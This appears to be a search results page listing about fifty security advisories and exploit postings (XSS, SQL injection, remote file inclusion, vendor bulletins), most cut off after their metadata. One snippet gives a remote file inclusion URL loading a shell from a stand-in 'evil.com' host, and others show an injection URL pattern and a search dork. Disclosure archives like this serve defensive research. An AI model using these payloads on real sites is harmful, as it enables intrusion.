47153 matches found
[ MDVSA-2015:185 ] dokuwiki
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:185 http://www.mandriva.com/en/support/security/ Package : dokuwiki Date : March 31, 2015 Affected: Business Server 1.0 Problem Description: Updated dokuwiki packages fix security vulnerabilities:...
Security Audit Notes: OpenSSL d1_srvr.c Overflow - Advanced Information Security
-= Advanced Information Security Corporation =- ------------------------------------------------------------------------ Author: Nicholas Lemonias Type: Security Audit Notes Date: 17/3/2015 Email: lem.nikolas at gmail dot com Audit: OpenSSL v1.0.2 22nd of January, 2015 Release...
[USN-2383-1] wpa_supplicant vulnerability
========================================================================== Ubuntu Security Notice USN-2383-1 October 14, 2014 wpa, wpasupplicant vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...
CVE-2014-1222 - Local File Inclusion in Vtiger CRM
Vulnerability title: Local File Inclusion in Vtiger CRM CVE: CVE-2014-1222 Vendor: Vtiger Product: CRM Affected version: Vtiger CRM 5.4.0, 6.0 RC & 6.0.0 GA Fixed version: Vtiger CRM 6.0.0 Security patch 1 Reported by: Jerzy Kramarz Details: A local file inclusion vulnerability was discovered in...
Remote Code Execution in Microweber
Advisory ID: HTB23175 Product: Microweber Vendor: Microweber Vulnerable Versions: 0.8 and probably prior Tested Version: 0.8 Advisory Publication: September 25, 2013 without technical details Vendor Notification: September 25, 2013 Vendor Patch: September 26, 2013 Public Disclosure: October 16,...
SKIDATA RFID Freemotion.Gate Unauthenticated Web Service Aribtrary Remote Command Execution
Title: SKIDATA RFID Freemotion.Gate Unauthenticated Web Service Aribtrary Remote Command Execution Product: Freemotion.Gate Vendor: SKIDATA, http://www.skidata.com/en/ RTP|One, http://http://www.rtp.com/ Vulnerable Versions: 4.1.3.5 and likely all prior versions. Tested Version: 4.1.3.5 Original...
CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE
Hello 3APA3A! I want to warn you about vulnerabilities in Moxiecode Image Manager MCImageManager. This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Content Spoofing, Cross-Site Scripting and Full Path...
[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities
Title: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities Affected Software: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 Description: Openconstructor...
FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities
OVERVIEW Fastpath WebChat is vulnerable to Cross Site Scripting. 2. BACKGROUND Fastpath WebChat is part of the Fastpath product. It provides a way for users to begin chatting with support agents using Fastpath. Fastpath is a plugin of OpenFire, a real time collaboration RTC server for instant...
D-Link DIR-601 TFTP Directory Traversal Vulnerability
Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...
APPLE-SA-2011-10-12-4 Safari 5.1.1
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-4 Safari 5.1.1 Safari 5.1.1 is now available and addresses the following: Safari Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.2, OS X Lion Server v10.7.2, Windows 7, Vista, XP SP2 or later Impact:...
OMNITEC (prodotto.php?id_prodotto) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability OMNITEC prodotto.php?idprodotto AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Persian Gulf 4 Ever! Dork : "design e realizzazione by OMNITEC" Exploite:...
[security bulletin] HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942411 Version: 1 HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access NOTICE: The information in this Security Bulletin should be acted up...
XSS и AoF уязвимости в Drupal
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и Abuse of Functionality уязвимостях в Drupal. XSS WASC-08: При добавлении или изменении данных в любых внутренних формах добавление/изменение поста и т.д. можно провести persistent XSS атаку. XSS код выполнится при посещении...
VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability
VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...
HTB22970: Multiple XSS vulnerabilities in PHPDug
Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...
LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86...
www.eVuln.com : Non-persistent XSS in slickMsg
www.eVuln.com advisory: Non-persistent XSS in slickMsg Summary: http://evuln.com/vulns/159/summary.html Details: http://evuln.com/vulns/159/description.html -----------Summary----------- eVuln ID: EV0159 Software: slickMsg Version: 0.7-alpha Critical Level: low Type: Cross Site Scripting Status:...
Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =============Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation================ Authors: Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry AT GMAIL DOT COM Website: http://evilcry.netsons.org...
[ONSEC-09-012] UMI.CMS Hash based Captcha
ONSEC-09-012 UMI.CMS Hash based Captcha Цель: UMI CMS =2.7.3 Тип: Обход ограничений Угроза: Средняя Дата обнаружения: 15.07.2009 Дата оповещения разработчика: 15.07.2009 Дата выхода исправления: 03.09.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group onsec dot ru Описание: В модуле...
Netgear DG632 Router Authentication Bypass Vulnerability
Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: [email protected] [email protected] Original URL: http://www.tomneaves.co.uk/NetgearDG632AuthenticationBypass.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG6...
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
?php / Geeklog = 1.5.2 savepreferences/blocks remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if isset...
Adgregate ShopAd widget validation is vulnerable to replay attack
Adgregate is a "TechCrunch 50" startup that recently signed a distribution deal with Google/DoubleClick 1. As a service, they offer a "viral widget" intended to be hosted on untrusted third-party sites through which consumers can enter their credit card information. According to their website, th...
US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...
Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities Advisory ID: cisco-sa-20080625-cucm Revision 1.0 For Public Release 2008 June 25 1600 UTC GMT...
Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability
========================================================== Starsgames Control Panel = 4.6.2 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 19 May 2008 SITE : www.citec.us APPLICATION : Starsgames Control Panel VERSION : = 4.6.2...
Liferay Enterprise Portal multiple XSS
Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...
fusetalk SQL (autherror.cfm)
Hello everyone, After trying to report bugs to FuseTalk, and seeing them providing patches to customers dropping new fixed .cfm files in a private place reserved to customers without giving proper credits and without reporting them publicly we were following the Full Disclosure Policy v2.0, we...
[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability
comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...
tar archiver directory traversal
Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...
LetterIt v2 (inc/session.php) Remote File Include Vulnerability
================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...
7 php scripts File Inclusion / Source disclosure Vuln
Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...
[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities
====================================================================== Secunia Research 14/09/2006 - Tagger LE PHP "eval" Injection Vulnerabilities - ====================================================================== Table of Contents Affected...
Popper <= v1.41 (form) Remote File Inclusion Exploit
============================================================================================== Popper = v1.41 form Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
OpenLDAP privilege escalation
User with 'selfwrite' ACL parameter can modify any attributes...
mambo-phphop Product Scroller Module R.F.I
Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp Software: mambo-phphop Product Scroller Module Attack method: Remote File Inclusion Source: / Load the phpshop main parse code / requireonce...
VBZooM "sendmail.php" SQL Injection
=========================================== Discovered By: C.B.B.L CrAzY CrAcKeR ,Breeeeh ,BoNy-m ,LiNuXrOOt =========================================== Example:- /sendmail.php?UserID=SQL Injection ===========================================...
[SIG^2 G-TEC] DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities
SIG^2 Vulnerability Research Advisory DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities by Tan Chew Keong Release Date: 02 Feb 2005 ADVISORY URL http://www.security.org.sg/vuln/desknow2512.html SUMMARY DeskNow Mail and Collaboration Server...
Vulnerability in AIX diagrpt
This file contains security alerts published by the IBM Emergency Response Service. These alerts are published at the following URL on the world-wide web: http://www.ers.ibm.com/ In order to keep the size of this file reasonable, it contains only advisories for the current year. You can obtain a...
CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection
Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...
[SECURITY] [DSA 2937-1] mod-wsgi security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2937-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq -...
OpenSSH protection bypass
SSHFP protection bypass for client...
[ISecAuditors Security Advisories] Multiple Vulnerabilities in Uebimiau <= 2.7.11
============================================= INTERNET SECURITY AUDITORS ALERT 2013-008 - Original release date: March 15th, 2013 - Last revised: March 20th, 2013 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 CVSS Base Score - CVE-ID: CVE-2013-2621, CVE-2013-2622, CVE-2013-2623...
Multiple vulnerabilities on D-Link DIR-645 devices
Multiple vulnerabilities on D-Link DIR-645 devices ================================================== ADVISORY INFORMATION Title: Multiple vulnerabilities on D-Link DIR-645 devices Discovery date: 06/03/2013 Release date: 02/08/2013 Advisory URL:...
[USN-1722-1] jQuery vulnerability
========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Cross-Site Scripting (XSS) in Jease
Advisory ID: HTB23104 Product: Jease Vendor: jease.org Vulnerable Versions: 2.8 and probably prior Tested Version: 2.8 Vendor Notification: July 25, 2012 Public Disclosure: August 15, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4052 CVSSv2 Base Score: 4.3...
Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access
OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...
[Announce] Apache HTTP Server 2.2.22 Released
Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...
[PT-2011-01] Cross-Site Scripting in Kayako Support Suite
------------------------------------------------------------------ PT-2011-01 Positive Technologies Security Advisory Cross-Site Scripting in Kayako Support Suite ------------------------------------------------------------------ --- Vulnerable software Kayako Support Suite Version: 3.70.02-stabl...
Multiple vulnerabilities in ImpressCMS
Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...